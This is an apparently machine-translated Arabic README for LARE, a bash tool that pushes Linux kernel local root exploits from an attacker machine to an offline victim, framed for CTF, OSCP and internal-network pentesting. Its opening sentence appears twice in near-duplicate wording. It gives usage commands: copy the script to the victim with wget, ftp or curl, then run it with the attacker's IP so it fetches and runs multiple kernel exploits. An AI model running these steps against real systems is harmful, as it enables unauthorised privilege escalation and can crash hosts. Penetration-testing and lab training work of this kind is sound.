
[L]ocal [A]uto [R]oot [E]xploiter هو برنامج bash بسيط يساعدك في نشر ثغرات الجذر المحلية من جهازك المهاجم عندما لا يتوفر لجهاز الضحية اتصال بالإنترنت.
[L]المحلي [A]التلقائي [R]الجذر [E]المستغل هو نص باش بسيط يساعدك على نشر ثغرات الجذر المحلية من جهازك المهاجم عندما لا يتوفر لجهاز الضحية اتصال بالإنترنت.
النص مفيد في سيناريو حيث لا يتوفر لجهاز الضحية اتصال بالإنترنت (مثلاً) أثناء التنقل عبر الشبكات الداخلية أو لعب مسابقات CTF التي تستخدم VPN للاتصال بمختبراتها المغلقة (مثلاً) hackthebox.gr أو حتى في مختبرات OSCP. يستخدم النص ثغرات الجذر المحلية لنواة لينكس 2.6-4.8
هذا النص مستوحى من أداة Auto Root Exploit الخاصة بـ Nilotpal Biswas Auto Root Exploit Tool
bash LARE.sh -a or ./LARE.sh -a
بمجرد الانتهاء من ذلك، يجب نسخ النص إلى جهاز الضحية بأي وسيلة (wget, ftp, curl إلخ). وتشغيل المستغل محليًا باستخدام الأمر التالي:
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
يقوم النص بتشغيل ثغرات متعددة في النواة على الجهاز مما قد يؤدي إلى عدم استقرار النظام، وينصح بشدة باستخدامه كملاذ أخير وفي بيئة غير إنتاجية.